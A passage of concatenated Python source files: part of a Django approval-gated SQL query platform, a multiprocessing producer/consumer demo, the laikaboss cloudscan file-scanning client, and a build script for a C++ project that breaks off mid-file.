query_sql = replace_limit(check[-1].strip(), conf.limit)
data_set = f.search(sql=query_sql)
querypermissions.objects.create(
work_id=user.work_id,
username=request.user,
statements=query_sql
)
return Response(data_set)
except Exception as e:
CUSTOM_ERROR.error(f'{e.__class__.__name__}: {e}')
return Response({'error': '查询失败,请查看错误日志定位具体问题'})
else:
return Response({'error': '已超过申请时限请刷新页面后重新提交申请'})
def put(self, request, args: str = None):
base = request.data['base']
table = request.data['table']
query_per = query_order.objects.filter(username=request.user).order_by('-id').first()
if query_per.query_per == 1:
_c = DatabaseList.objects.filter(
connection_name=query_per.connection_name,
computer_room=query_per.computer_room
).first()
try:
with con_database.SQLgo(
ip=_c.ip,
password=_c.password,
user=_c.username,
port=_c.port,
db=base
) as f:
data_set = f.search(sql='desc %s'%table)
return Response(data_set)
except:
return Response('')
else:
return Response({'error': '已超过申请时限请刷新页面后重新提交申请'})
def replace_limit(sql, limit):
'''
    :argument Analyses the input statement with a regex match; when the LIMIT row count exceeds the maximum allowed in the config file, the config file maximum is used instead.
'''
if sql[-1] != ';':
sql += ';'
    if sql.startswith('show'):
        return sql
sql_re = re.search(r'limit\s.*\d.*;',sql.lower())
length = ''
if sql_re is not None:
c = re.search(r'\d.*', sql_re.group())
if c is not None:
if c.group().find(',') != -1:
                length = c.group().split(',')[-1].rstrip(';')
else:
length = c.group().rstrip(';')
if int(length) <= int(limit):
return sql
else:
sql = re.sub(r'limit\s.*\d.*;', 'limit %s;' % limit, sql)
return sql
else:
sql = sql.rstrip(';') + ' limit %s;'%limit
return sql
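# Illustrative behaviour, assuming conf.limit == 1000:
#   replace_limit('select * from t', 1000)             -> 'select * from t limit 1000;'
#   replace_limit('select * from t limit 20;', 1000)   -> unchanged (20 <= 1000)
#   replace_limit('select * from t limit 5000;', 1000) -> 'select * from t limit 1000;'
#   show statements are returned unchanged.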
class query_worklf(baseview.BaseView):
@staticmethod
def query_callback(timer, work_id):
query_order.objects.filter(work_id=work_id).update(query_per=1)
try:
time.sleep(int(timer) * 60)
except:
time.sleep(60)
finally:
query_order.objects.filter(work_id=work_id).update(query_per=3)
def get(self, request, args: str = None):
page = request.GET.get('page')
page_number = query_order.objects.aggregate(alter_number=Count('id'))
start = int(page) * 10 - 10
end = int(page) * 10
info = query_order.objects.all().order_by('-id')[start:end]
serializers = Query_review(info, many=True)
return Response({'page': page_number, 'data': serializers.data})
def post(self, request, args: str = None):
work_id = request.data['workid']
user = request.data['user']
data = querypermissions.objects.filter(work_id=work_id,username=user).all().order_by('-id')
serializers = Query_list(data, many=True)
return Response(serializers.data)
def put(self, request, args: str = None):
if request.data['mode'] == 'put':
instructions = request.data['instructions']
connection_name = request.data['connection_name']
computer_room = request.data['computer_room']
timer = request.data['timer']
export = request.data['export']
audit = request.data['audit']
work_id = util.workId()
try:
timer = int(timer)
query_order.objects.create(
work_id=work_id,
instructions=instructions,
username=request.user,
timer=timer,
date=util.date(),
query_per=2,
connection_name=connection_name,
computer_room=computer_room,
export= export,
audit=audit,
time=util.date()
)
except:
query_order.objects.create(
work_id=work_id,
instructions=instructions,
username=request.user,
timer=1,
date=util.date(),
query_per=2,
connection_name=connection_name,
computer_room=computer_room,
export=export,
audit=audit,
time=util.date()
)
userinfo = Account.objects.filter(username=audit, group='admin').first()
thread = threading.Thread(target=push_message, args=({'to_user': request.user, 'workid': work_id}, 5, request.user, userinfo.email, work_id, '提交'))
thread.start()
            ## DingTalk and email in-app notification push
return Response('查询工单已提交,等待管理员审核!')
elif request.data['mode'] == 'agree':
work_id = request.data['work_id']
query_info = query_order.objects.filter(work_id=work_id).order_by('-id').first()
t = threading.Thread(target=query_worklf.query_callback, args=(query_info.timer, work_id))
userinfo = Account.objects.filter(username=query_info.username).first()
thread = threading.Thread(target=push_message, args=({'to_user': query_info.username, 'workid': query_info.work_id}, 6, query_info.username, userinfo.email, work_id, '同意'))
t.start()
thread.start()
return Response('查询工单状态已更新!')
elif request.data['mode'] == 'disagree':
work_id = request.data['work_id']
query_order.objects.filter(work_id=work_id).update(query_per=0)
query_info = query_order.objects.filter(work_id=work_id).order_by('-id').first()
userinfo = Account.objects.filter(username=query_info.username).first()
thread = threading.Thread(target=push_message, args=({'to_user': query_info.username, 'workid': query_info.work_id}, 7, query_info.username, userinfo.email,work_id, '驳回'))
thread.start()
return Response('查询工单状态已更新!')
elif request.data['mode'] == 'status':
status = query_order.objects.filter(username=request.user).order_by('-id').first()
try:
return Response(status.query_per)
except:
return Response(0)
elif request.data['mode'] == 'info':
tablelist = []
database = query_order.objects.filter(username=request.user).order_by('-id').first()
_connection = DatabaseList.objects.filter(connection_name=database.connection_name).first()
with con_database.SQLgo(ip=_connection.ip,
user=_connection.username,
password=_connection.password,
port=_connection.port) as f:
dataname = f.query_info(sql='show databases')
children = []
ignore = ['information_schema', 'sys', 'performance_schema', 'mysql']
            dataname = [d for d in dataname if d['Database'] not in ignore]
for i in dataname:
with con_database.SQLgo(ip=_connection.ip,
user=_connection.username,
password=_connection.password,
port=_connection.port,
db=i['Database']) as f:
tablename = f.query_info(sql='show tables')
for c in tablename:
key = 'Tables_in_%s'%i['Database']
children.append({
'title': c[key]
})
tablelist.append({
'title': i['Database'],
'children': children
})
children = []
data = [{
'title': database.connection_name,
'expand': 'true',
'children': tablelist
}]
return Response({'info':json.dumps(data),'status': database.export})
def delete(self, request, args: str = None):
data = query_order.objects.filter(username=request.user).order_by('-id').first()
query_order.objects.filter(work_id=data.work_id).delete()
return Response('')
def push_message(message=None, type=None, user=None, to_addr=None, work_id=None, status=None):
try:
put_mess = send_email.send_email(to_addr=to_addr)
put_mess.send_mail(mail_data=message, type=type)
except Exception as e:
CUSTOM_ERROR.error(f'{e.__class__.__name__}: {e}')
else:
try:
util.dingding(content='查询申请通知\n工单编号:%s\n发起人:%s\n状态:%s' % (work_id, user, status), url=WEBHOOK)
except ValueError as e:
CUSTOM_ERROR.error(f'{e.__class__.__name__}: {e}')
class Query_order(baseview.SuperUserpermissions):
def get(self, request, args: str = None):
page = request.GET.get('page')
pn = query_order.objects.filter(audit=request.user).all().values('id')
pn.query.distinct = ['id']
start = int(page) * 10 - 10
end = int(page) * 10
user_list = query_order.objects.all().order_by('-id')[start:end]
serializers = Query_review(user_list, many=True)
return Response({'data': serializers.data, 'pn': len(pn)})
def post(self, request, args: str = None):
work_id_list = json.loads(request.data['work_id'])
for i in work_id_list:
query_order.objects.filter(work_id=i).delete()
return Response('申请记录已删除!')
|
consumer_producer.py
|
import time
import random
from multiprocessing import Queue,Process
def consumer(name, q):
    while True:
        res = q.get()
        if res is None:  # sentinel: producer is finished
            break
        time.sleep(random.randint(1, 3))
        print('Consumer >> %s is ready to eat %s.' % (name, res))
def producer(name, q):
    for i in range(5):
        time.sleep(random.randint(1, 2))
        res = 'prawn %s' % i
        q.put(res)
        print('Producer >>> %s produced %s' % (name, res))
if __name__ == '__main__':
    q = Queue()  # a shared queue
    p1 = Process(target=producer, args=('monicx', q))
    c1 = Process(target=consumer, args=('lili', q))
    p1.start()
    c1.start()
    p1.join()    # wait for the producer to finish
    q.put(None)  # send the sentinel so the consumer can exit
    c1.join()
|
cloudscan.py
|
#!/usr/bin/env python
# Copyright 2015 Lockheed Martin Corporation
# Copyright 2020 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# A networked client for the laikaboss framework.
# Must have an instance of laikad running locally or on a server
# accessible by this client over ssh.
#
# This client is based on the ZeroMQ Lazy Pirate pattern
#
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from multiprocessing import Process, Queue
import os, sys, time, logging, select
import getpass
from socket import gethostname
from optparse import OptionParser
from laikaboss.lbconfigparser import LBConfigParser
import pickle as pickle
from laikaboss.objectmodel import ExternalObject, ExternalVars
from laikaboss.constants import level_minimal, level_metadata, level_full
from laikaboss.clientLib import Client, getRootObject, get_scanObjectUID, \
getJSON
from random import randint
import json
from copy import deepcopy as clone_object
from distutils.util import strtobool
job_queue = Queue()
result_queue = Queue()
failed_queue = Queue()
# Variable to store configs from file
configs = {}
# Defaults for all available configurations
# To be used if not specified on command line or config file
default_configs = {
'use_ssh': 'False',
'broker_host': 'tcp://localhost:5558',
'ssh_host': 'localhost',
'request_timeout': '600000',
'request_retries': '1',
'return_level': 'metadata',
'num_procs': '8',
}
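# Example cloudscan.conf sketch (illustrative values only; the section name is
# arbitrary because main() flattens every section into one dict, and getConfig()
# falls back to default_configs for any key missing from the file):
#
#   [cloudscan]
#   broker_host = tcp://scanbroker.example.com:5558
#   use_ssh = False
#   return_level = metadata
#   num_procs = 8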
def getConfig(option):
value = ''
if option in configs:
value = configs[option]
else:
value = default_configs[option]
return value
def main():
parser = OptionParser(usage="usage: %prog [options] (/path/to/file | stdin)")
parser.add_option("-d", "--debug",
action="store_true",
dest="debug",
help="enable debug messages to the console.")
parser.add_option("-r", "--remove-limit",
action="store_true",
dest="nolimit",
help="disable 20mb size limit (be careful!)")
parser.add_option("-t", "--timeout",
action="store", type="int",
dest="timeout",
help="adjust request timeout period (in seconds)")
parser.add_option("-c", "--config-path",
action="store", type="string",
dest="config_path",
help="specify a path to cloudscan.conf.")
parser.add_option("-a", "--address",
action="store", type="string",
dest="broker_host",
help="specify an IP and port to connect to the broker")
parser.add_option("-f", "--file-list",
action="store", type="string",
dest="file_list",
help="Specify a list of files to scan")
parser.add_option("-s", "--ssh-host",
action="store", type="string",
dest="ssh_host",
help="specify a host for the SSH tunnel")
parser.add_option("-p", "--num-procs",
action="store", type="int", default=6,
dest="num_procs",
help="Specify the number of processors to use for recursion")
parser.add_option("-u", "--source",
action="store", type="string",
dest="source",
help="specify a custom source")
parser.add_option("--ssh",
action="store_true",
default=False,
dest="use_ssh",
help="Use SSH tunneling")
parser.add_option("-l", "--level",
action="store", type="string",
dest="return_level",
help="Return Level: minimal, metadata, full [default: metadata]")
parser.add_option("-o", "--out-path",
action="store", type="string",
dest="save_path",
help="If Return Level Full has been specified, provide a path to "
"save the results to [default: current directory]")
parser.add_option("-b", "--buffer",
action="store_true",
dest="stdin_buffer",
help="Specify to allow a buffer to be collected by stdin.")
parser.add_option("-e", "--ephID",
action="store", type="string",
dest="ephID", default="",
help="Specify an ephID to send to Laika.")
parser.add_option("-m", "--ext-metadata",
action="store",
dest="ext_metadata",
help="Specify external metadata to be passed into the scanner.")
parser.add_option("-z", "--log",
action="store_true",
dest="log_db",
help="Specify to turn on logging results.")
parser.add_option("-R", "--recursive",
action="store_true",
default=False,
dest="recursive",
help="Enable recursive directory scanning. If enabled, all files "
"in the specified directory will be scanned. Results will "
"be output to cloudscan.log in the current directory.")
(options, args) = parser.parse_args()
# Define default configuration location
CONFIG_PATH = "/etc/laikaboss/cloudscan.conf"
if options.config_path:
CONFIG_PATH = options.config_path
Config = LBConfigParser()
Config.read(CONFIG_PATH)
# Parse through the config file and append each section to a single dictionary
global configs
for section in Config.sections():
configs.update(dict(Config.items(section)))
    # Set the working path, this will be used for file output if another
# path is not specified
WORKING_PATH = os.getcwd()
if options.use_ssh:
USE_SSH = True
else:
if strtobool(getConfig('use_ssh')):
USE_SSH = True
else:
USE_SSH = False
if options.ssh_host:
SSH_HOST = options.ssh_host
else:
SSH_HOST = getConfig('ssh_host')
if options.broker_host:
BROKER_HOST = options.broker_host
else:
BROKER_HOST = getConfig('broker_host')
if options.debug:
logging.basicConfig(level=logging.DEBUG)
logging.debug("Host: %s" % BROKER_HOST)
if options.return_level:
RETURN_LEVEL = options.return_level
else:
RETURN_LEVEL = getConfig('return_level')
if options.source:
SOURCE = options.source
else:
SOURCE = "cloudscan"
if not options.log_db:
SOURCE += "-nolog"
if options.save_path:
SAVE_PATH = options.save_path
else:
SAVE_PATH = WORKING_PATH
if options.num_procs:
num_procs = int(options.num_procs)
else:
num_procs = int(getConfig('num_procs'))
if options.timeout:
logging.debug("default timeout changed to %i" % options.timeout)
REQUEST_TIMEOUT = options.timeout * 1000
else:
REQUEST_TIMEOUT = int(getConfig('request_timeout'))
if options.ext_metadata:
try:
if os.path.exists(options.ext_metadata):
with open(options.ext_metadata) as metafile:
ext_metadata = json.loads(metafile.read())
else:
ext_metadata = json.loads(options.ext_metadata)
assert isinstance(ext_metadata, dict)
except:
print("External Metadata must be a dictionary!")
sys.exit(0)
else:
ext_metadata = dict()
REQUEST_RETRIES = int(getConfig('request_retries'))
# Attempt to get the hostname
try:
hostname = gethostname().split('.')[0]
except:
hostname = "none"
# Attempt to set the return level, throw an error if it doesn't exist.
try:
return_level = globals()["level_%s" % RETURN_LEVEL]
except KeyError as e:
print("Please specify a valid return level: minimal, metadata or full")
sys.exit(1)
if not options.recursive:
try:
file_buffer = ''
# Try to read the file
if len(args) > 0:
file_buffer = open(args[0], 'rb').read()
file_len = len(file_buffer)
logging.debug("opened file %s with len %i" % (args[0], file_len))
else:
while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
line = sys.stdin.readline()
if not line:
break
else:
file_buffer += line
if not file_buffer:
parser.print_usage()
sys.exit(1)
file_len = len(file_buffer)
if file_len > 20971520 and not options.nolimit:
print("You're trying to scan a file larger than 20mb.. Are you sure?")
print("Use the --remove-limit flag if you really want to do this.")
sys.exit(1)
except IOError as e:
print("\nERROR: The file does not exist: %s\n" % (args[0],))
sys.exit(1)
else:
try:
fileList = []
if options.file_list:
fileList = open(options.file_list).read().splitlines()
else:
if len(args) > 0:
rootdir = args[0]
for root, subFolders, files in os.walk(rootdir):
for fname in files:
fileList.append(os.path.join(root, fname))
else:
while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
line = sys.stdin.readline()
if not line:
break
else:
fileList.append(line)
if not fileList:
parser.print_usage()
sys.exit(1)
if len(fileList) > 1000 and not options.nolimit:
print("You're trying to scan over 1000 files... Are you sure?")
print("Use the --remove-limit flag if you really want to do this.")
sys.exit(1)
except IOError as e:
print("\nERROR: Directory does not exist: %s\n" % (args[0],))
sys.exit(1)
if not options.recursive:
# Construct the object to be sent for scanning
if args:
filename = args[0]
else:
filename = "stdin"
ext_metadata['server'] = hostname
ext_metadata['user'] = getpass.getuser()
externalObject = ExternalObject(buffer=file_buffer,
externalVars=ExternalVars(filename=filename,
ephID=options.ephID,
extMetaData=ext_metadata,
source="%s-%s-%s" % (SOURCE,
hostname,
getpass.getuser())),
level=return_level)
try:
if not options.recursive:
# Set up ZMQ context
if USE_SSH:
try:
logging.debug("attempting to connect to broker at %s and SSH host %s" % (BROKER_HOST, SSH_HOST))
client = Client(BROKER_HOST, useSSH=True, sshHost=SSH_HOST, useGevent=True)
except RuntimeError as e:
logging.exception("could not set up SSH tunnel to %s" % SSH_HOST)
sys.exit(1)
else:
logging.debug("SSH has been disabled.")
client = Client(BROKER_HOST, useGevent=True)
starttime = time.time()
result = client.send(externalObject, retry=REQUEST_RETRIES, timeout=REQUEST_TIMEOUT)
logging.debug("got reply in %s seconds" % str(time.time() - starttime))
if result:
rootObject = getRootObject(result)
try:
jsonResult = getJSON(result)
print(jsonResult)
except:
logging.exception("error occured collecting results")
return
if return_level == level_full:
SAVE_PATH = "%s/%s" % (SAVE_PATH, get_scanObjectUID(rootObject))
if not os.path.exists(SAVE_PATH):
try:
os.makedirs(SAVE_PATH)
print("\nWriting results to %s...\n" % SAVE_PATH)
except (OSError, IOError) as e:
print("\nERROR: unable to write to %s...\n" % SAVE_PATH)
return
else:
print("\nOutput folder already exists! Skipping results output...\n")
return
for uid, scanObject in result.files.items():
f = open("%s/%s" % (SAVE_PATH, uid), "wb")
f.write(scanObject.buffer)
f.close()
try:
if scanObject.filename and scanObject.parent:
linkPath = "%s/%s" % (SAVE_PATH, scanObject.filename.replace("/","_"))
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
elif scanObject.filename:
filenameParts = scanObject.filename.split("/")
os.symlink("%s" % (uid), "%s/%s" % (SAVE_PATH, filenameParts[-1]))
except:
print("Unable to create symlink for %s" % (uid))
f = open("%s/%s" % (SAVE_PATH, "results.log"), "w")
f.write(jsonResult)
f.close()
sys.exit(1)
else:
print("ERROR: No result received (scan timed out)")
return
else:
try:
fh = open('cloudscan.log', 'w')
fh.close()
except:
pass
for fname in fileList:
job_queue.put(fname)
for i in range(num_procs):
job_queue.put("STOP")
print("File list length: %s" % len(fileList))
for i in range(num_procs):
Process(target=worker, args=(options.nolimit, REQUEST_RETRIES, REQUEST_TIMEOUT, SAVE_PATH, SOURCE, return_level, hostname, USE_SSH, BROKER_HOST, SSH_HOST,ext_metadata,options.ephID,)).start()
results_processed = 0
while results_processed < len(fileList):
logging.debug("Files left: %s" % ((len(fileList) - results_processed)))
resultText = result_queue.get()
try:
# Process results
                    fh = open('cloudscan.log', 'a')
fh.write('%s\n' % resultText)
fh.close()
results_processed += 1
except Exception as e:
raise
print('Wrote results to cloudscan.log')
except KeyboardInterrupt:
print("Interrupted by user, exiting...")
sys.exit(1)
def worker(nolimit, REQUEST_RETRIES, REQUEST_TIMEOUT, SAVE_PATH, SOURCE, return_level, hostname, USE_SSH, BROKER_HOST, SSH_HOST, ext_metadata, ephID):
# Set up ZMQ context
if USE_SSH:
try:
logging.debug("attempting to connect to broker at %s and SSH host %s" % (BROKER_HOST, SSH_HOST))
client = Client(BROKER_HOST, useSSH=True, sshHost=SSH_HOST)
except RuntimeError as e:
logging.exception("could not set up SSH tunnel to %s" % SSH_HOST)
sys.exit(1)
else:
logging.debug("SSH has been disabled.")
client = Client(BROKER_HOST)
randNum = randint(1, 10000)
for fname in iter(job_queue.get, 'STOP'):
print("Worker %s: Starting new request" % randNum)
try:
# Try to read the file
file_buffer = open(fname, 'rb').read()
file_len = len(file_buffer)
logging.debug("opened file %s with len %i" % (fname, file_len))
if file_len > 20971520 and not nolimit:
print("You're trying to scan a file larger than 20mb.. Are you sure?")
print("Use the --remove-limit flag if you really want to do this.")
print("File has not been scanned: %s" % fname)
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile has not been scanned due to size: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
except IOError as e:
print("\nERROR: The file does not exist: %s\n" % (fname,))
print("Moving to next file...")
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile has not been scanned due to an IO Error: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
try:
# Construct the object to be sent for scanning
externalObject = ExternalObject(buffer=file_buffer,
externalVars=ExternalVars(filename=fname,
ephID=ephID,
extMetaData=ext_metadata,
source="%s-%s-%s" % (SOURCE,
hostname,
getpass.getuser())),
level=return_level)
starttime = time.time()
result = client.send(externalObject, retry=REQUEST_RETRIES, timeout=REQUEST_TIMEOUT)
if not result:
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nFile timed out in the scanner: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
logging.debug("got reply in %s seconds" % str(time.time() - starttime))
rootObject = getRootObject(result)
jsonResult = getJSON(result)
resultText = '%s\n' % jsonResult
if return_level == level_full:
FILE_SAVE_PATH = "%s/%s" % (SAVE_PATH, get_scanObjectUID(rootObject))
if not os.path.exists(FILE_SAVE_PATH):
try:
os.makedirs(FILE_SAVE_PATH)
print("Writing results to %s..." % FILE_SAVE_PATH)
except (OSError, IOError) as e:
print("\nERROR: unable to write to %s...\n" % FILE_SAVE_PATH)
return
else:
print("\nOutput folder already exists! Skipping results output...\n")
return
for uid, scanObject in result.files.items():
f = open("%s/%s" % (FILE_SAVE_PATH, uid), "wb")
f.write(scanObject.buffer)
f.close()
if scanObject.filename and scanObject.depth != 0:
linkPath = "%s/%s" % (FILE_SAVE_PATH, scanObject.filename.replace("/","_"))
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
elif scanObject.filename:
filenameParts = scanObject.filename.split("/")
linkPath = "%s/%s" % (FILE_SAVE_PATH, filenameParts[-1])
if not os.path.lexists(linkPath):
os.symlink("%s" % (uid), linkPath)
f = open("%s/%s" % (FILE_SAVE_PATH, "results.json"), "wb")
f.write(jsonResult)
f.close()
result_queue.put(resultText)
except:
#logging.exception("error occured collecting results")
result_queue.put("~~~~~~~~~~~~~~~~~~~~\nUNKNOWN ERROR OCCURRED: %s\n~~~~~~~~~~~~~~~~~~~~" % fname)
continue
if __name__ == "__main__":
main()
|
make.py
|
# coding: utf-8
from __future__ import print_function
import argparse
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import time
import zipfile
# The current test/decompression data version in use
current_test_data = 'test_data_v3'
current_decomp_data = 'decomp_data_v5'
def parse_argv():
parser = argparse.ArgumentParser(add_help=False)
actions = parser.add_argument_group(title='Actions', description='If no action is specified, on Windows, OS X, and Linux the solution/make files are generated. Multiple actions can be used simultaneously.')
actions.add_argument('-build', action='store_true')
actions.add_argument('-clean', action='store_true')
actions.add_argument('-unit_test', action='store_true')
actions.add_argument('-regression_test', action='store_true')
target = parser.add_argument_group(title='Target')
target.add_argument('-compiler', choices=['vs2015', 'vs2017', 'vs2019', 'vs2019-clang', 'android', 'clang4', 'clang5', 'clang6', 'clang7', 'clang8', 'clang9', 'gcc5', 'gcc6', 'gcc7', 'gcc8', 'gcc9', 'osx', 'ios'], help='Defaults to the host system\'s default compiler')
target.add_argument('-config', choices=['Debug', 'Release'], type=str.capitalize)
target.add_argument('-cpu', choices=['x86', 'x64', 'armv7', 'arm64'], help='Defaults to the host system\'s architecture')
misc = parser.add_argument_group(title='Miscellaneous')
misc.add_argument('-avx', dest='use_avx', action='store_true', help='Compile using AVX instructions on Windows, OS X, and Linux')
misc.add_argument('-pop', dest='use_popcnt', action='store_true', help='Compile using the POPCNT instruction')
misc.add_argument('-nosimd', dest='use_simd', action='store_false', help='Compile without SIMD instructions')
misc.add_argument('-nosjson', dest='use_sjson', action='store_false', help='Compile without SJSON support')
    misc.add_argument('-num_threads', help='Number of threads to use while compiling and running regression tests')
misc.add_argument('-tests_matching', help='Only run tests whose names match this regex')
misc.add_argument('-help', action='help', help='Display this usage information')
num_threads = multiprocessing.cpu_count()
if platform.system() == 'Linux' and sys.version_info >= (3, 4):
num_threads = len(os.sched_getaffinity(0))
if not num_threads or num_threads == 0:
num_threads = 4
parser.set_defaults(build=False, clean=False, unit_test=False, regression_test=False, compiler=None, config='Release', cpu=None, use_avx=False, use_popcnt=False, use_simd=True, use_sjson=True, num_threads=num_threads, tests_matching='')
args = parser.parse_args()
# Sanitize and validate our options
if args.use_avx and not args.use_simd:
print('SIMD is disabled; AVX cannot be used')
args.use_avx = False
if args.compiler == 'android':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Windows':
print('Android is only supported on Windows')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on Android')
sys.exit(1)
if not args.cpu in ['armv7', 'arm64']:
print('{} cpu architecture not in supported list [armv7, arm64] for Android'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'ios':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Darwin':
print('iOS is only supported on OS X')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on iOS')
sys.exit(1)
if args.unit_test:
print('Unit tests cannot run from the command line on iOS')
sys.exit(1)
if not args.cpu in ['arm64']:
print('{} cpu architecture not in supported list [arm64] for iOS'.format(args.cpu))
sys.exit(1)
else:
if not args.cpu:
args.cpu = 'x64'
if args.cpu == 'arm64':
if not args.compiler in ['vs2017', 'vs2019', 'ios', 'android']:
print('arm64 is only supported with VS2017, VS2019, Android, and iOS')
sys.exit(1)
elif args.cpu == 'armv7':
if not args.compiler == 'android':
print('armv7 is only supported with Android')
sys.exit(1)
if platform.system() == 'Darwin' and args.cpu == 'x86':
result = subprocess.check_output(['xcodebuild', '-version']).decode("utf-8")
if 'Xcode 11' in result:
print('Versions of Xcode 11 and up no longer support x86')
sys.exit(1)
return args
def get_cmake_exes():
if platform.system() == 'Windows':
return ('cmake.exe', 'ctest.exe')
else:
return ('cmake', 'ctest')
def get_generator(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2015':
if cpu == 'x86':
return 'Visual Studio 14'
elif cpu == 'x64':
return 'Visual Studio 14 Win64'
elif compiler == 'vs2017':
if cpu == 'x86':
return 'Visual Studio 15'
elif cpu == 'x64':
return 'Visual Studio 15 Win64'
elif cpu == 'arm64':
# VS2017 ARM/ARM64 support only works with cmake 3.13 and up and the architecture must be specified with
# the -A cmake switch
return 'Visual Studio 15 2017'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
return 'Visual Studio 16 2019'
elif compiler == 'android':
# For Android, we use the default generator since we don't build with CMake
return None
elif platform.system() == 'Darwin':
if compiler == 'osx' or compiler == 'ios':
return 'Xcode'
else:
return 'Unix Makefiles'
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def get_architecture(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2017':
if cpu == 'arm64':
return 'ARM64'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
if cpu == 'x86':
return 'Win32'
else:
return cpu
# This compiler/cpu pair does not need the architecture switch
return None
def get_toolchain(compiler, cmake_script_dir):
if platform.system() == 'Windows' and compiler == 'android':
return os.path.join(cmake_script_dir, 'Toolchain-Android.cmake')
elif platform.system() == 'Darwin' and compiler == 'ios':
return os.path.join(cmake_script_dir, 'Toolchain-iOS.cmake')
# No toolchain
return None
def set_compiler_env(compiler, args):
if platform.system() == 'Linux':
os.environ['MAKEFLAGS'] = '-j{}'.format(args.num_threads)
if compiler == 'clang4':
os.environ['CC'] = 'clang-4.0'
os.environ['CXX'] = 'clang++-4.0'
elif compiler == 'clang5':
os.environ['CC'] = 'clang-5.0'
os.environ['CXX'] = 'clang++-5.0'
elif compiler == 'clang6':
os.environ['CC'] = 'clang-6.0'
os.environ['CXX'] = 'clang++-6.0'
elif compiler == 'clang7':
os.environ['CC'] = 'clang-7'
os.environ['CXX'] = 'clang++-7'
elif compiler == 'clang8':
os.environ['CC'] = 'clang-8'
os.environ['CXX'] = 'clang++-8'
elif compiler == 'clang9':
os.environ['CC'] = 'clang-9'
os.environ['CXX'] = 'clang++-9'
elif compiler == 'gcc5':
os.environ['CC'] = 'gcc-5'
os.environ['CXX'] = 'g++-5'
elif compiler == 'gcc6':
os.environ['CC'] = 'gcc-6'
os.environ['CXX'] = 'g++-6'
elif compiler == 'gcc7':
os.environ['CC'] = 'gcc-7'
os.environ['CXX'] = 'g++-7'
elif compiler == 'gcc8':
os.environ['CC'] = 'gcc-8'
os.environ['CXX'] = 'g++-8'
elif compiler == 'gcc9':
os.environ['CC'] = 'gcc-9'
os.environ['CXX'] = 'g++-9'
else:
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def do_generate_solution(cmake_exe, build_dir, cmake_script_dir, test_data_dir, decomp_data_dir, args):
compiler = args.compiler
cpu = args.cpu
config = args.config
if compiler:
set_compiler_env(compiler, args)
extra_switches = ['--no-warn-unused-cli']
extra_switches.append('-DCPU_INSTRUCTION_SET:STRING={}'.format(cpu))
if args.use_avx:
print('Enabling AVX usage')
extra_switches.append('-DUSE_AVX_INSTRUCTIONS:BOOL=true')
if args.use_popcnt:
print('Enabling POPCOUNT usage')
extra_switches.append('-DUSE_POPCNT_INSTRUCTIONS:BOOL=true')
if not args.use_simd:
print('Disabling SIMD instruction usage')
extra_switches.append('-DUSE_SIMD_INSTRUCTIONS:BOOL=false')
if not args.use_sjson:
print('Disabling SJSON support')
extra_switches.append('-DUSE_SJSON:BOOL=false')
if not platform.system() == 'Windows' and not platform.system() == 'Darwin':
extra_switches.append('-DCMAKE_BUILD_TYPE={}'.format(config.upper()))
toolchain = get_toolchain(compiler, cmake_script_dir)
if toolchain:
extra_switches.append('-DCMAKE_TOOLCHAIN_FILE={}'.format(toolchain))
generator_suffix = ''
if compiler == 'vs2019-clang':
extra_switches.append('-T ClangCL')
generator_suffix = 'Clang CL'
if test_data_dir:
extra_switches.append('-DTEST_DATA_DIR:STRING="{}"'.format(test_data_dir))
if decomp_data_dir:
extra_switches.append('-DDECOMP_DATA_DIR:STRING="{}"'.format(decomp_data_dir))
# Generate IDE solution
print('Generating build files ...')
cmake_cmd = '"{}" .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(cmake_exe, build_dir, ' '.join(extra_switches))
cmake_generator = get_generator(compiler, cpu)
if not cmake_generator:
print('Using default generator')
else:
print('Using generator: {} {}'.format(cmake_generator, generator_suffix))
cmake_cmd += ' -G "{}"'.format(cmake_generator)
cmake_arch = get_architecture(compiler, cpu)
if cmake_arch:
print('Using architecture: {}'.format(cmake_arch))
cmake_cmd += ' -A {}'.format(cmake_arch)
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_build(cmake_exe, args):
config = args.config
print('Building ...')
cmake_cmd = '"{}" --build .'.format(cmake_exe)
if platform.system() == 'Windows':
if args.compiler == 'android':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target INSTALL'.format(config)
elif platform.system() == 'Darwin':
if args.compiler == 'ios':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target install'.format(config)
else:
cmake_cmd += ' --target install'
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_tests_android(build_dir, args):
